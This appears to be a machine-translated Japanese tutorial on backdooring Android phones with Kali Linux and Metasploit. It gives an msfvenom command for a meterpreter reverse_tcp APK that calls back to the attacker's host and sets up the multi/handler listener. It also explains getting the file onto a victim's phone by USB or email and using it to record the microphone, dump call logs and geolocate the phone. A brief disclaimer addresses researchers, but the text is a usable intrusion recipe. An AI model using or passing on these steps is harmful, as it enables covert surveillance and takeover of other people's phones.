Kali Linux を使用して Android 携帯電話にアクセスする方法
Android スマートフォンは、ほとんどの商用 IoT ガジェットへのゲートウェイとなることがよくあります。 Nest 煙警報器は、関連する Android アプリを通じて管理されます。温度を制御するための Nest Thermostat も同様です。スマート ロック、ドアベル カム - ほぼすべてのスマート デバイスは、Alexa または他のマスター アプリからアクセスできます。誰かがそのような Android スマートフォンにリモート アクセスできたらどうなるでしょうか?これは不可能だと思いますか?このために、Kali Linux の「メタスプロイト」を使用して Android スマートフォンにバックドア エントリを作成する方法の基本的なデモを行います。
注: このチュートリアルはセキュリティ研究者および愛好家を対象としています。許可なく誰かの携帯電話をハッキングすることはお勧めしません。
背景
Kali Linux での作業を開始する前に、まずそのコンソール ターミナルに慣れる必要があります。
デバイスのファームウェアまたはオペレーティング システムを対象とするように設計されたツールの包括的なリストを簡単にホストします。
ここでは、「MSFVenom」と呼ばれる一般的なツールの 1 つを使用して、Android スマートフォンにウイルスを挿入します。ユーザーが選択したオプションに基づいて、複数の種類のペイロードを生成します。このエクスプロイトは、Windows、Android、OpenBSD、Solaris、JAVA、PHP、ゲーム ハードウェアなどの多くのプラットフォームで機能します。
Android Metasploit の起動
次の手順では、Kali Linux システムに MSFVenom をダウンロードする方法を示します。
ターミナルを起動し、以下のコマンドを入力します。
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
ここでは、ペイロードは「Meterpreter」と呼ばれるエクスプロイト拡張機能を使用して起動されます。
リスナー ホストの IP アドレスを確認するには、新しいコンソール ターミナルを開き、ifconfig
と入力します。通常、ポート 4444 はトロイの木馬、エクスプロイト、ウイルスに割り当てられます。
IP アドレスが決定したら、前の画面に戻って詳細を入力します。
ファイル「hackand.apk」はデスクトップに保存され、Android スマートフォンで使用される主要なバックドア エクスプロイトです。
次のステップでは、Kali Linux で使用される一般的な侵入テスト ツールである「msfconsole」を起動します。このためには、service postgresql start
に続いて msfconsole
と入力します。 PostgreSQL は、コンソールが保存されているデータベースを指します。
侵入ツールの準備ができたら、残りのエクスプロイトを起動できます。
次に「マルチハンドラー」と呼ばれる実行ファイルを使用します。
use multi/handler
エクスプロイトをコンソールに接続するには、以下の画像を参照してください。同じ IP アドレスとポート番号が使用されます。
次の段階では、msfvenom エクスプロイトが起動され、単純な exploit
コマンドで初期化されます。次に、Android スマートフォンとなるターゲットを見つける必要があります。
Kali Linux ターミナルと Android Phone の接続
先ほどダウンロードした hackand.apk ファイルのサイズはわずか 10 KB です。ターゲットの電話にファイルを挿入する方法を見つける必要があります。 USB または一時的な電子メール サービスを使用してウイルスを転送できます。
一般に、Gmail や Yahoo などの Web メール プロバイダーは、このウイルスに感染したファイルの送信を拒否します。
Android はソフトウェアを挿入する前に警告を表示します。ただし、「リスクを無視してインストールする」だけなので、インストールが完了するまでにかかる時間は 20 秒もかかりません。このため、携帯電話がロック解除モードにある場合、脅威はある程度深刻になります。
ここに示すように、ストレージ内容の変更、携帯電話のスリープ防止、Wi-Fi への接続と切断、壁紙の設定など、携帯電話に多くの損害が発生する可能性があります。
APK ファイルがインストールされると、携帯電話内で巧妙に偽装することができます。
これで、Kali Linux ターミナルで次のような多くのコマンドを使用して電話機を制御できるようになります。リストは meterpreter
の簡単な help
オプションから入手できるため、実際に覚える必要はありません。
record_mic
: マイクを録音しますdump calllog
: 通話ログを取得します。webcam_chat
: ビデオチャットを開始しますgeolocate
: 携帯電話の現在の位置を取得します。
ほとんどの高度な Android スマートフォンは、この悪意のあるアプリのインストールを防ぎます。したがって、このエクスプロイトは通常、古い Android モデルでも機能します。
こちらもお読みください: Android 向けのベスト ハッキング アプリ 14 選
思い
このチュートリアルでは、Kali Linux を使用して Android スマートフォンにアクセスする基本的な戦略について説明しました。これは非常に単純なエクスプロイトですが、IoT セキュリティの観点からは大きな影響を及ぼします。
Kali Linux のエクスプロイトについてどう思いますか?携帯電話のセキュリティについてもっと慎重になりますか?コメントでお知らせください。